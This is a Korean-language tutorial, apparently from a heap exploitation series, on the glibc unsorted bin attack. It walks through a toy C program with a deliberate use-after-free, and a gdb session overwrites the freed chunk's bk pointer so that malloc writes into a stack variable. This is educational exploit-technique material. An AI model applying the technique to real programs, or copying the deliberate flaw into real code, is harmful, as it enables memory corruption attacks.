
List

Conditions

Exploit plan

Exploit point

  for (;; )
    {
      int iters = 0;
      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
        {
          bck = victim->bk;
			...

          /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);

			...
		}

unsorted_chunks() 함수는 main_arena.top의 주소를 리턴합니다.

Example

Files

Source code

#include <stdio.h>
#include <stdlib.h>

/*
 * Minimal target program for the unsorted-bin-attack walkthrough.
 *
 * The program's own logic never assigns `state` after initialising it to 0,
 * so the "Hello world!" branch is unreachable by design; it can only run if
 * something outside the program's intended writes corrupts `state`. That
 * corruption is what the debugging session below demonstrates.
 *
 * Return value: no explicit return; under C99 and later, falling off the end
 * of main() is equivalent to `return 0;`.
 */
int main(){
        long state = 0;

        /* Discloses the address of a stack variable. In a real program this
           is an information leak that defeats stack ASLR for this frame; here
           it exists only so the walkthrough can locate `state`. */
        printf("Stack : %p\n", &state);
        char *buf1 = malloc(130);
        /* buf2 sits between buf1 and the top chunk, so freeing buf1 below
           does not consolidate it into top; the freed chunk stays in a bin. */
        char *buf2 = malloc(500);

        free(buf1);

        /* Use-after-free: buf1 is a dangling pointer at this point, and the
           write lands on the freed chunk's fd/bk list pointers. The bound is
           fine (%16s writes at most 17 bytes into a 130-byte region); the
           defect is writing through a freed pointer. AddressSanitizer
           (-fsanitize=address) reports this as heap-use-after-free. */
        scanf("%16s",buf1);

        /* Same request size as the freed chunk. Per the _int_malloc excerpt
           above, taking a chunk out of the unsorted bin performs
           `bck->fd = unsorted_chunks(av)`, i.e. a write through the chunk's
           bk pointer, which the previous scanf() controls. */
        buf1 = malloc(130);

        /* Only true if the unlink write above was redirected onto `state`;
           the program itself never sets it. */
        if(state){
                printf("Hello world!\n");
        }
}

Exploit flow

Debugging

gdb-peda$ b *0x00000000004006c6
Breakpoint 1 at 0x4006c6
gdb-peda$ b *0x00000000004006dc
Breakpoint 2 at 0x4006dc
gdb-peda$ b *0x00000000004006e6
Breakpoint 3 at 0x4006e6
gdb-peda$ b *0x00000000004006fd
Breakpoint 4 at 0x4006fd
gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/def/unsortedBinAttack 
Stack : 0x7fffffffe258

Breakpoint 1, 0x00000000004006c6 in main ()
gdb-peda$ p main_arena.bins[1]
$1 = (mchunkptr) 0x7ffff7dd37b8 <main_arena+88>

gdb-peda$ x/84gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x0000000000000000	0x0000000000000000
0x602020:	0x0000000000000000	0x0000000000000000
0x602030:	0x0000000000000000	0x0000000000000000
0x602040:	0x0000000000000000	0x0000000000000000
0x602050:	0x0000000000000000	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x0000000000000000
0x602080:	0x0000000000000000	0x0000000000000000
0x602090:	0x0000000000000000	0x0000000000000201
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000000
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000000000
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000000
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000000000
0x602290:	0x0000000000000000	0x0000000000020d71
gdb-peda$
gdb-peda$ c

Continuing.
Breakpoint 2, 0x00000000004006dc in main ()

gdb-peda$ p main_arena.bins[1]
$2 = (mchunkptr) 0x602000
gdb-peda$ x/6gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x602020:	0x0000000000000000	0x0000000000000000

gdb-peda$ ni
AAAAAAAABBBBBBBB

gdb-peda$ x/6gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x4141414141414141	0x4242424242424242
0x602020:	0x0000000000000000	0x0000000000000000

0x00000000004006e1 in main ()
gdb-peda$ set *0x602010 = 0x00007ffff7dd37b8
gdb-peda$ set *0x602014 = 0x00007fff
gdb-peda$ set *0x602018 = 0x7fffffffe258 - 16
gdb-peda$ set *0x60201c = 0x7fff
gdb-peda$ x/6gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x00007ffff7dd37b8	0x00007fffffffe248
0x602020:	0x0000000000000000	0x0000000000000000
gdb-peda$
gdb-peda$ c
Continuing.

Breakpoint 3, 0x00000000004006e6 in main ()
gdb-peda$ x/gx 0x7fffffffe258
0x7fffffffe258:	0x0000000000000000

gdb-peda$ ni
0x00000000004006eb in main ()

gdb-peda$ x/gx 0x7fffffffe258
0x7fffffffe258:	0x00007ffff7dd37b8
gdb-peda$ x/gx 0x00007ffff7dd37b8
0x7ffff7dd37b8 <main_arena+88>:	0x0000000000602290
gdb-peda$ p &main_arena.top 
$3 = (mchunkptr *) 0x7ffff7dd37b8 <main_arena+88>
gdb-peda$ p main_arena.bins[1]
$10 = (mchunkptr) 0x7fffffffe248
gdb-peda$ 
gdb-peda$ c
Continuing.

Breakpoint 4, 0x00000000004006fd in main ()
gdb-peda$  ni
Hello world!

0x0000000000400702 in main ()
gdb-peda$

Related information